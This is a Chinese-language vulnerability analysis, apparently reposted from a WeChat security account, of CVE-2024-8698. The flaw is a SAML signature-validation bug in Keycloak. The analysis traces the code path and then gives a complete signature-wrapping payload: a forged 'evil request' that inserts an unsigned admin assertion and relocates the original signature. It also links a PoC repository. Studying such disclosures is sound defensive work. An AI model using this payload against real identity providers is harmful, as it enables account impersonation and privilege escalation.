概括 :
Keycloak XMLSignatureUtil 类中的 SAML 签名验证方法存在缺陷。该方法错误地根据签名在 XML 文档中的位置(而不是用于指定签名元素的 Reference 元素)确定 SAML 签名是针对完整文档还是仅针对特定断言。此缺陷允许攻击者创建可以绕过验证的精心设计的响应,从而可能导致特权提升或冒充攻击。
补丁分析师:
提交中漏洞的补丁:
https://github.com/keycloak/keycloak/commit/ae6a686870b57182c0635ae60f0fe81d57cf15e3
通过阅读描述和提交,我们可以发现该漏洞存在于XMLSignatureUtil类的validate函数中,该函数错误地用断言的签名确定了整个文档的签名,从而导致攻击者能够进行提权。
设置和调试:
下载
https://github.com/keycloak/keycloak/releases/download/25.0.5/keycloak-25.0.5.zip
解压该文件,然后运行以下命令:
.binkc.bat start-dev --debug 8989接下来,将keycloak lib导入Idea并使用端口8989运行远程调试
=> 完成调试设置
KeyCloak 基础版:
Keycloak 是一个面向现代应用程序和服务的开源身份提供商和访问管理。用于管理身份和对应用程序/服务的访问。它充当许多应用程序的单点登录 (SSO) 服务,Keycloak 还支持 OAuth 2.0、OpenID 和 SAML 2.0 等协议
对于 SAML 2.0,基本流程如下:
用户A想要登录gitlab应用程序(服务提供商),用户A必须通过keycloak(身份提供商)登录。登录成功,keycloak将发送saml响应到gitlab,gitlab验证saml响应,成功将允许用户使用该应用程序
从函数追踪后,我们发现源点在类中:
org.keycloak.broker.saml.SAMLEndpoint此类用于身份代理。什么是身份经纪人?
身份代理是一项允许用户使用来自外部身份提供商的凭据来访问其他应用程序和服务的服务。
简单地说,身份代理是一项允许您使用另一个 idp(例如:facebook、google...)登录到您的 keycloak 的服务
现在设置另一个身份提供者来使用keycloak的broker功能,这里我使用wordpress,并使用Wordpress IDP插件将wordpress变成一个身份提供者。
代码分析师:
响应将在handleSamlResponse函数中进行处理:
返回跟踪
→ SamlProtocolUtils.verifyDocumentSignature → SAML2Signature.validate → XMLSignatureUtil.validate
该函数的逻辑如下:
首先,它获取所有签名元素,然后循环遍历每个节点,它会检查当前节点是否属于父节点,这是一个断言,然后它会增加每个节点的signedAssertions计数器。它循环通过,它将通过 validateSingleNode() 函数运行
validateSigleNode 函数的逻辑很简单,就是验证这个签名节点。回到validate函数,循环结束后会转向条件:如果节点断言的数量与节点断言总数的签名不同,则返回false(检测到恶意断言)。
验证成功后会跳转到handleloginResponse函数
在函数开头设置断点,直接跳到第624行:
如果以下所有三个条件均为 false,则此函数将根据收到的响应设置属性的属性:
-
条件 1:如果配置要求 WantAssertionsSigned 设置为 true(默认为 false)并且变量signed = false
-
条件 2:如果变量signed = true,则启用配置验证签名(默认)并且函数 AssertionUtil.isSignatureValid() 返回 false
-
条件3:变量signed = false,配置验证签名已启用(默认)并且函数 containsUnencryptedSignature() (该函数检查响应文档是否包含元素签名)返回 false
如果断言包含签名,则签名变量返回 true,否则返回 false。
此时,满足条件后,我们将根据第一个断言设置属性:
所以程序流程可以简单描述如下:
第 1 步:程序接收来自代理的 SAMLResponse
第 2 步:验证文档中出现的签名是否有效
步骤3:检查3个条件:assertionSignatureNotExistsWhenRequired、signatureNotValid、hasNoSignatureWhenRequired。如果这三个条件都为假,则执行出现的第一个断言
证实
该缺陷出现在验证函数中的逻辑之间。该函数XMLSignatureUtil.validate()验证响应文档中的所有签名,然后将这些签名进行验证。验证过程在第 3.2 节中XMLSignatureUtil.validateUsingKeySelector()
定义。.org/TR/xmldsig-core1/#sec-CoreValidation
验证过程由两部分组成。第1部分是用公钥验证SignatureValue值,第2部分是验证Reference值,即验证digestValue值。
例如 :
<?xml version="1.0" encoding="utf-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" Version="2.0" IssueInstant="2024-10-10T08:53:59Z" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIIElTCCA32gAwIBAgIUG9ZkPUYwnNJ9yXXYBrtasp/99HowDQYJKoZIhvcNAQELBQAwgbMxFzAVBgNVBAMMDm1pbmlvcmFuZ2UuY29tMRUwEwYDVQQDDAx4ZWN1cmlmeS5jb20xCzAJBgNVBAYTAlVTMRAwDgYDVQQIDAdXeW9taW5nMREwDwYDVQQHDAhDaGV5ZW5uZTEtMCsGA1UECgwkbWluaU9yYW5nZSBTZWN1cml0eSBTb2Z0d2FyZSBQdnQgTHRkMSAwHgYJKoZIhvcNAQkBFhFpbmZvQHhlY3VyaWZ5LmNvbTAeFw0yMzExMjQxMDM4MTNaFw0yNTAxMTcxMDM4MTNaMIGzMRcwFQYDVQQDDA5taW5pb3JhbmdlLmNvbTEVMBMGA1UEAwwMeGVjdXJpZnkuY29tMQswCQYDVQQGEwJVUzEQMA4GA1UECAwHV3lvbWluZzERMA8GA1UEBwwIQ2hleWVubmUxLTArBgNVBAoMJG1pbmlPcmFuZ2UgU2VjdXJpdHkgU29mdHdhcmUgUHZ0IEx0ZDEgMB4GCSqGSIb3DQEJARYRaW5mb0B4ZWN1cmlmeS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeT2P3tJpOYcjbrXt6xRnxwbFD1GouFM8nMbkEyGxjEP2OHNHhbXI0hSXaOgbpUBW9sGTPPWNGK3avDclvK6pQIMeyk272DIq+IG0aFN8PrlxpPQQClxwdpt0YWDBpWO31dFsTuUukUWlQwbzu3Z/2DN7b8R9KKPhDlb3RYKTznD9zPU5nrpG4qtNbMAjPCOrgmjMEByRsnHnAWupNE15bzSDF0YISl6LGgpDe+MQo2VpyZyxH/NUEs4LvDAiM0AZwawe2FzyPVm3Z/SIp7Eer5L3F4OfHZ89J6Dm3DYH4WtnhqN74bU/OWGyNZ+kbFRoo6Gr9ZvHbHWl9w8HZIcgbAgMBAAGjgZ4wgZswHQYDVR0OBBYEFB7iZs2DOlek7jPH5YrEGOTjujWmMB8GA1UdIwQYMBaAFB7iZs2DOlek7jPH5YrEGOTjujWmMA4GA1UdDwEB/wQEAwIFoDAgBgNVHSUBAf8EFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwJwYDVR0RBCAwHoIObWluaW9yYW5nZS5jb22CDHhlY3VyaWZ5LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAm6v4wqLtMS1myybOiBLt79hJvJPumVnWthKFWGO2/mDMXMBS1X8dVK8h2Yn220xq8DTbIDxJW019iOmA7uEpdHNjyqtiRUTsEcBBdeRcSu1qS6IHtzlPdhFBWjbKx8u7Skv17ILhz5oW8yCjttueVvwVin0WUwQRM4Qn63QspmzK9K57w6AHzSs8z3eo9kUCgsd90VePGloZG0ZZ3WVnA3L1v6wS5dbbe6nF4Q7sji/y8+mzFmDBmn2FSFk755R+pV/1SXporU9S8f/t1goP3VPw0up6dQefRuHWZjjq1qaV4v5yLUhz/dsQ8dhuERRrHaJ41Ftq8DL363kbDZ48qg==</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>验证签名的过程首先会查找签名数据,即Reference的URI引用的数据,这里是ID为a11a434527ab2de06ea8262a23e93166710c88f65的元素,接下来数据将经过转换步骤,然后hash = sha256,这个值将与用公钥解码签名值后得到的哈希值进行比较
Reference 验证过程还会从 Keyinfo 中的 Reference URI 中获取值,并比较两个 sha256 哈希值
此时,如果我们为整个响应创建相同的签名。上面的代码将无法确定此签名是来自响应还是断言,它仍然会使用从 URI => 获取的数据进行验证,从而导致绕过此验证部分。
通过验证函数的下一个条件:
应用程序检查签名断言的数量是否等于文档中断言的数量
这个条件可以通过两种方式绕过,方法一是不允许签署任何断言,方法二是创建一个假断言并自己签名。当然,第二种方式是不可能的,因为没有私钥。第一种方法是删除断言部分中的所有签名。
处理登录响应
继续执行 HandleLoginResponse 函数,这里我们需要通过 3 个条件才能执行完整的绕过。
首先,为signed 分配一个值,该值是AssertionUtil.isSignedElement()
该函数的返回值。该函数搜索当前断言以查看它是否包含Signature 元素。在当前流程中,我们删除了断言中的所有签名,因此signed = False。
-
条件 1:SAMLEndpoint.this.config.isWantAssertionsSigned() 默认为 False,因此条件 2 始终为 false
-
条件 2:signed 当前为 false ,因此整个表达式将为 false (AND 中按位 1 为 false 则它将为 false )
-
条件 3:前 2 个为 true,该函数containsUnencryptedSignature()将检查整个文档是否包含签名。根据流程,我们将签名从断言放入响应中,因此该函数将返回 true => 条件 3 将。也可能是假的
接下来,在通过上述条件后,应用程序将采用第一个断言并根据该断言分配属性
所以绕过的想法如下:
首先,您需要一个低级别的拦截器帐户来获取该请求或删除请求中的 SAMLResponse
步骤2:将该断言的签名移至响应部分,删除该断言的签名,然后复制该断言,在上面创建一个新断言并将其更改为 email admin
步骤 3:重新发送 saml 请求
例如 :
原始 SamlResponse:
<?xml version="1.0" encoding="utf-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" Version="2.0" IssueInstant="2024-10-10T08:53:59Z" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIIElTCCA32gAwIBAgIUG9ZkPUYwnNJ9yXXYBrtasp/99HowDQYJKoZIhvcNAQELBQAwgbMxFzAVBgNVBAMMDm1pbmlvcmFuZ2UuY29tMRUwEwYDVQQDDAx4ZWN1cmlmeS5jb20xCzAJBgNVBAYTAlVTMRAwDgYDVQQIDAdXeW9taW5nMREwDwYDVQQHDAhDaGV5ZW5uZTEtMCsGA1UECgwkbWluaU9yYW5nZSBTZWN1cml0eSBTb2Z0d2FyZSBQdnQgTHRkMSAwHgYJKoZIhvcNAQkBFhFpbmZvQHhlY3VyaWZ5LmNvbTAeFw0yMzExMjQxMDM4MTNaFw0yNTAxMTcxMDM4MTNaMIGzMRcwFQYDVQQDDA5taW5pb3JhbmdlLmNvbTEVMBMGA1UEAwwMeGVjdXJpZnkuY29tMQswCQYDVQQGEwJVUzEQMA4GA1UECAwHV3lvbWluZzERMA8GA1UEBwwIQ2hleWVubmUxLTArBgNVBAoMJG1pbmlPcmFuZ2UgU2VjdXJpdHkgU29mdHdhcmUgUHZ0IEx0ZDEgMB4GCSqGSIb3DQEJARYRaW5mb0B4ZWN1cmlmeS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeT2P3tJpOYcjbrXt6xRnxwbFD1GouFM8nMbkEyGxjEP2OHNHhbXI0hSXaOgbpUBW9sGTPPWNGK3avDclvK6pQIMeyk272DIq+IG0aFN8PrlxpPQQClxwdpt0YWDBpWO31dFsTuUukUWlQwbzu3Z/2DN7b8R9KKPhDlb3RYKTznD9zPU5nrpG4qtNbMAjPCOrgmjMEByRsnHnAWupNE15bzSDF0YISl6LGgpDe+MQo2VpyZyxH/NUEs4LvDAiM0AZwawe2FzyPVm3Z/SIp7Eer5L3F4OfHZ89J6Dm3DYH4WtnhqN74bU/OWGyNZ+kbFRoo6Gr9ZvHbHWl9w8HZIcgbAgMBAAGjgZ4wgZswHQYDVR0OBBYEFB7iZs2DOlek7jPH5YrEGOTjujWmMB8GA1UdIwQYMBaAFB7iZs2DOlek7jPH5YrEGOTjujWmMA4GA1UdDwEB/wQEAwIFoDAgBgNVHSUBAf8EFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwJwYDVR0RBCAwHoIObWluaW9yYW5nZS5jb22CDHhlY3VyaWZ5LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAm6v4wqLtMS1myybOiBLt79hJvJPumVnWthKFWGO2/mDMXMBS1X8dVK8h2Yn220xq8DTbIDxJW019iOmA7uEpdHNjyqtiRUTsEcBBdeRcSu1qS6IHtzlPdhFBWjbKx8u7Skv17ILhz5oW8yCjttueVvwVin0WUwQRM4Qn63QspmzK9K57w6AHzSs8z3eo9kUCgsd90VePGloZG0ZZ3WVnA3L1v6wS5dbbe6nF4Q7sji/y8+mzFmDBmn2FSFk755R+pV/1SXporU9S8f/t1goP3VPw0up6dQefRuHWZjjq1qaV4v5yLUhz/dsQ8dhuERRrHaJ41Ftq8DL363kbDZ48qg==</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">test@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>邪恶请求
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://127.0.0.1:8080/realms/master/broker/saml/endpoint" ID="addf4d01a0076b2fa36278805129ac8e5a46d04c9" InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_lpe" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="a11a434527ab2de06ea8262a23e93166710c88f65" IssueInstant="2024-10-10T08:53:59Z" Version="2.0">
<saml:Issuer>http://localhost/wordpress/wp-content/plugins/miniorange-wp-as-saml-idp/</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">test@abc.co</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="ID_b2df2d79-a443-4f59-9c53-43fce49f8141" NotOnOrAfter="2024-10-10T08:58:59Z" Recipient="http://127.0.0.1:8080/realms/master/broker/saml/endpoint"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2024-10-10T08:53:29Z" NotOnOrAfter="2024-10-10T08:58:59Z">
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1:8080/realms/master</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2024-10-10T08:51:59Z" SessionIndex="_a28268d14233fd60612afedd1c3d6f6" SessionNotOnOrAfter="2024-10-10T16:53:59Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#a11a434527ab2de06ea8262a23e93166710c88f65">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>OrrB2CQGFegn8NFOmsGJjv1wUPIKd+3OvJoX8PMUtlw=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>wY8pHpcQaHJwodifZG0Qx4gmYYOOXiGGHohXFDiPGK9WQY3dOWXD2IQOu14LouFN7jnKvgqdFU5q93Hd8ae67KPoVCJkZvQ3E3WlS1T66CHGhvE4UT6oS3BCRKcB2FMvUBbngPiI6f2H/wGKGAQ6KMqEx9i4+GWRjFTyAIYUxJXcYTGv/JILyLEkotx1crdSpRZLSyOkyFBkPj3TvyQfqRp21Li042tVzb2+H0Nj1nQek5KznqDKrOdLr0Du+INWj3mcpQNIuEzJthvdwYmQ0aDi0JZOuyjUbH/pYVQcmi2vHASBBi815k9TOZ1zrYOuDDBK2cqnoSpg5VPVjdiGZw==</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIIElTCCA32gAwIBAgIUG9ZkPUYwnNJ9yXXYBrtasp/99HowDQYJKoZIhvcNAQELBQAwgbMxFzAVBgNVBAMMDm1pbmlvcmFuZ2UuY29tMRUwEwYDVQQDDAx4ZWN1cmlmeS5jb20xCzAJBgNVBAYTAlVTMRAwDgYDVQQIDAdXeW9taW5nMREwDwYDVQQHDAhDaGV5ZW5uZTEtMCsGA1UECgwkbWluaU9yYW5nZSBTZWN1cml0eSBTb2Z0d2FyZSBQdnQgTHRkMSAwHgYJKoZIhvcNAQkBFhFpbmZvQHhlY3VyaWZ5LmNvbTAeFw0yMzExMjQxMDM4MTNaFw0yNTAxMTcxMDM4MTNaMIGzMRcwFQYDVQQDDA5taW5pb3JhbmdlLmNvbTEVMBMGA1UEAwwMeGVjdXJpZnkuY29tMQswCQYDVQQGEwJVUzEQMA4GA1UECAwHV3lvbWluZzERMA8GA1UEBwwIQ2hleWVubmUxLTArBgNVBAoMJG1pbmlPcmFuZ2UgU2VjdXJpdHkgU29mdHdhcmUgUHZ0IEx0ZDEgMB4GCSqGSIb3DQEJARYRaW5mb0B4ZWN1cmlmeS5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDeT2P3tJpOYcjbrXt6xRnxwbFD1GouFM8nMbkEyGxjEP2OHNHhbXI0hSXaOgbpUBW9sGTPPWNGK3avDclvK6pQIMeyk272DIq+IG0aFN8PrlxpPQQClxwdpt0YWDBpWO31dFsTuUukUWlQwbzu3Z/2DN7b8R9KKPhDlb3RYKTznD9zPU5nrpG4qtNbMAjPCOrgmjMEByRsnHnAWupNE15bzSDF0YISl6LGgpDe+MQo2VpyZyxH/NUEs4LvDAiM0AZwawe2FzyPVm3Z/SIp7Eer5L3F4OfHZ89J6Dm3DYH4WtnhqN74bU/OWGyNZ+kbFRoo6Gr9ZvHbHWl9w8HZIcgbAgMBAAGjgZ4wgZswHQYDVR0OBBYEFB7iZs2DOlek7jPH5YrEGOTjujWmMB8GA1UdIwQYMBaAFB7iZs2DOlek7jPH5YrEGOTjujWmMA4GA1UdDwEB/wQEAwIFoDAgBgNVHSUBAf8EFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwJwYDVR0RBCAwHoIObWluaW9yYW5nZS5jb22CDHhlY3VyaWZ5LmNvbTANBgkqhkiG9w0BAQsFAAOCAQEAm6v4wqLtMS1myybOiBLt79hJvJPumVnWthKFWGO2/mDMXMBS1X8dVK8h2Yn220xq8DTbIDxJW019iOmA7uEpdHNjyqtiRUTsEcBBdeRcSu1qS6IHtzlPdhFBWjbKx8u7Skv17ILhz5oW8yCjttueVvwVin0WUwQRM4Qn63QspmzK9K57w6AHzSs8z3eo9kUCgsd90VePGloZG0ZZ3WVnA3L1v6wS5dbbe6nF4Q7sji/y8+mzFmDBmn2FSFk755R+pV/1SXporU9S8f/t1goP3VPw0up6dQefRuHWZjjq1qaV4v5yLUhz/dsQ8dhuERRrHaJ41Ftq8DL363kbDZ48qg==</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
</samlp:Response>POC
https://github.com/huydoppaz/CVE-2024-8698-POC
Reference
https://viblo.asia/p/saml-hacking-phan-2-xml-signatures-38X4EPGgVN2
https://www.w3.org/TR/xmldsig-core1/#sec-CoreValidation
https://github.com/keycloak/keycloak/issues/33116
https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/
原文始发于微信公众号(Ots安全):CVE-2024-8698:SAML 响应验证不当导致 Keycloak 权限提升
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论